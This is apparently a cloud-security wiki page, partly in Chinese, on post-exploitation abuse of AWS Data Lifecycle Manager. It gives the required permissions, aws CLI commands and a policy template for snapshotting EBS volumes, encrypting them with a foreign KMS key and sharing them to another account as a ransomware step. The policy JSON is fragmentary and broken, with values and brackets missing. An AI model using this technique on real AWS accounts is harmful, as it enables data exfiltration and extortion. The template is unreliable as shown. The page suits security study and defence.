AWS - DLM Post Exploitation

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数据生命周期管理器 (DLM)

EC2:DescribeVolumes, DLM:CreateLifeCyclePolicy

勒索软件攻击可以通过加密尽可能多的 EBS 卷,然后擦除当前的 EC2 实例、EBS 卷和快照来执行。为了自动化这种恶意活动,可以利用 Amazon DLM,使用来自另一个 AWS 帐户的 KMS 密钥加密快照,并将加密的快照转移到另一个帐户。或者,他们可以将未加密的快照转移到他们管理的帐户,然后在那里对其进行加密。虽然直接加密现有的 EBS 卷或快照并不简单,但可以通过创建新卷或快照来实现。

首先,将使用一个命令收集有关卷的信息,例如实例 ID、卷 ID、加密状态、附件状态和卷类型。 aws ec2 describe-volumes

Secondly, one will create the lifecycle policy. This command employs the DLM API to set up a lifecycle policy that automatically takes daily snapshots of specified volumes at a designated time. It also applies specific tags to the snapshots and copies tags from the volumes to the snapshots. The policyDetails.json file includes the lifecycle policy's specifics, such as target tags, schedule, the ARN of the optional KMS key for encryption, and the target account for snapshot sharing, which will be recorded in the victim's CloudTrail logs.

aws dlm create-lifecycle-policy --description "我的第一个策略" --state ENABLED --execution-role-arn arn:aws:iam::12345678910:role/AWSDataLifecycleManagerDefaultRole --policy-details file://policyDetails.json

A template for the policy document can be seen here:
"ResourceTypes": [
"TargetTags": [
"Key": "ExampleKey",
"Value": "ExampleValue"
"Schedules": [
"Name": "DailySnapshots",
"CopyTags": true,
"TagsToAdd": [
"Key": "SnapshotCreator",
"Value": "DLM"
"VariableTags": [
"Key": "CostCenter",
"Value": "Finance"
"CreateRule": {
"Interval": 24,
"IntervalUnit": "HOURS",
"Times": [
"RetainRule": {
"Count": 14
"FastRestoreRule": {
"Count": 2,
"Interval": 12,
"IntervalUnit": "HOURS"
"CrossRegionCopyRules": [
"TargetRegion": "us-west-2",
"Encrypted": true,
"CmkArn": "arn:aws:kms:us-west-2:123456789012:key/your-kms-key-id",
"CopyTags": true,
"RetainRule": {
"Interval": 1,
"IntervalUnit": "DAYS"
"ShareRules": [
"TargetAccounts": [
"UnshareInterval": 30,
"UnshareIntervalUnit": "DAYS"
"Parameters": {
"ExcludeBootVolume": false

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